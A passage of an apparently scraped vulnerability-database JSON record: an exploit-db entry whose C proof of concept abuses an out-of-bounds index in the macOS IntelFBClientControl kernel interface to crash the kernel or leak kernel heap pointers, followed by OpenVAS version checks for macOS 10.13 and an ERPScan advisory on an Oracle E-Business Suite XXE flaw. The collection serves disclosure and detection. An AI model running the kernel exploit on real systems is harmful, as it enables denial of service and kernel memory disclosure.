attacker-controlled dword value from a userclient structure\r\ninput buffer which it uses to index a small array of pointers to memory to copy back to userspace.\r\n\r\nThere is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary\r\nkernel memory:\r\n\r\n__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer\r\n__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB\r\n__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL\r\n__text:000000000002ACF1 jz short loc_2AD10\r\n__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset\r\n__text:000000000002ACFA mov edx, 1D8h ; size_t\r\n__text:000000000002ACFF mov rdi, r14 ; void *\r\n__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace\r\n\r\nTested on MacOS 10.13 (17A365) on MacBookAir5,2\r\n#endif\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#include <IOKit/IOKitLib.h>\r\n\r\nint main(int argc, char** argv){\r\n kern_return_t err;\r\n\r\n io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(\"IntelFBClientControl\"));\r\n\r\n if (service == IO_OBJECT_NULL){\r\n printf(\"unable to find service\\n\");\r\n return 0;\r\n }\r\n\r\n io_connect_t conn = MACH_PORT_NULL;\r\n err = IOServiceOpen(service, mach_task_self(), 0, &conn);\r\n if (err != KERN_SUCCESS){\r\n printf(\"unable to get user client connection\\n\");\r\n return 0;\r\n }\r\n\r\n uint64_t inputScalar[16]; \r\n uint64_t inputScalarCnt = 0;\r\n\r\n char inputStruct[4096];\r\n size_t inputStructCnt = 8;\r\n *(uint64_t*)inputStruct = 0x12345678; // crash\r\n //*(uint64_t*)inputStruct = 0x37; // disclose kernel heap memory\r\n\r\n\r\n uint64_t outputScalar[16];\r\n uint32_t outputScalarCnt = 0;\r\n\r\n char outputStruct[4096];\r\n size_t outputStructCnt = 4096;\r\n \r\n err = IOConnectCallMethod(\r\n conn,\r\n 
0x710,\r\n inputScalar,\r\n inputScalarCnt,\r\n inputStruct,\r\n inputStructCnt,\r\n outputScalar,\r\n &outputScalarCnt,\r\n outputStruct,\r\n &outputStructCnt); \r\n\r\n if (outputStructCnt > 20) {\r\n int n_leaked_ptrs = (outputStructCnt-7)/8;\r\n uint64_t* ptrs = (uint64_t*) (outputStruct+7);\r\n for (int i = 0; i < n_leaked_ptrs; i++) {\r\n printf(\"%016llx\\n\", ptrs[i]);\r\n }\r\n }\r\n return 0;\r\n}", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43780/"}], "openvas": [{"lastseen": "2019-07-17T14:22:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5754", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13858", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13876", "CVE-2017-7163", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-13848", "CVE-2017-13875"], "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310812400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812400", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331, HT208394)-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple MacOSX Security Updates(HT208331, HT208394)-01\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812400\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-13872\", \"CVE-2017-5754\", \"CVE-2017-13860\", \"CVE-2017-13871\",\n \"CVE-2017-13865\", \"CVE-2017-13876\", \"CVE-2017-13848\", \"CVE-2017-13858\",\n \"CVE-2017-13875\", \"CVE-2017-13878\", \"CVE-2017-13883\", \"CVE-2017-7163\",\n \"CVE-2017-7155\", \"CVE-2017-7171\");\n script_bugtraq_id(101981, 102378, 102097, 102099, 102100);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:33 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331, HT208394)-01\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update resolves, a logic error\n existed in the validation of credentials, an encryption issue existed with S/MIME\n credentials, an inconsistent user interface issue and an error in systems with\n microprocessors utilizing speculative execution, memory corruption issue,\n input validation issue existed in the kernel, an out-of-bounds read error and\n indirect branch prediction.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n 
attackers to execute arbitrary code with kernel and system privileges. Also\n attacker may be able to bypass administrator authentication without supplying\n the administrator's password and also allow unauthorized disclosure of\n information to an attacker with local user access via a side-channel analysis\n of the data cache and can cause unexpected system termination.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions, 10.13.x through 10.13.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.13.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208394\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.13\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.13\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.1\"))\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.13.2\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:22:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13871", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13858", "CVE-2017-13878", "CVE-2017-13876", "CVE-2017-13883", "CVE-2017-13848", "CVE-2017-13875"], "description": "This host is installed with 
Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310812408", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812408", "type": "openvas", "title": "Apple MacOSX Security Updates(HT208331)-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple MacOSX Security Updates(HT208331)-04\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812408\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-13876\", \"CVE-2017-13875\", \"CVE-2017-13871\", \"CVE-2017-13860\",\n\t\t\"CVE-2017-13883\", \"CVE-2017-13848\", \"CVE-2017-13858\", \"CVE-2017-13878\",\n\t \"CVE-2017-13865\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 10:51:33 +0530 (Thu, 07 Dec 2017)\");\n script_name(\"Apple MacOSX Security Updates(HT208331)-04\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The Security update resolves,\n\n - A memory corruption issue was addressed with improved memory handling.\n\n - An out-of-bounds read was addressed through improved bounds checking.\n\n - A logic error existed in the validation of credentials.\n\n - An inconsistent user interface issue was addressed with improved state management.\n\n - An input validation issue existed in the kernel.\n\n - An out-of-bounds read issue existed that led to the disclosure of kernel memory.\n\n - A validation issue was addressed with improved input sanitization.\n\n - An encryption issue existed with S/MIME credentials.\");\n\n script_tag(name:\"impact\", 
value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code with kernel and system privileges. Also\n attacker may be able to bypass administrator authentication without supplying\n the administrator's password.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.13.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.13.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.13\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.13\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif(osVer == \"10.13.1\")\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.13.2\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": 
"\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. 
REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. 
Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}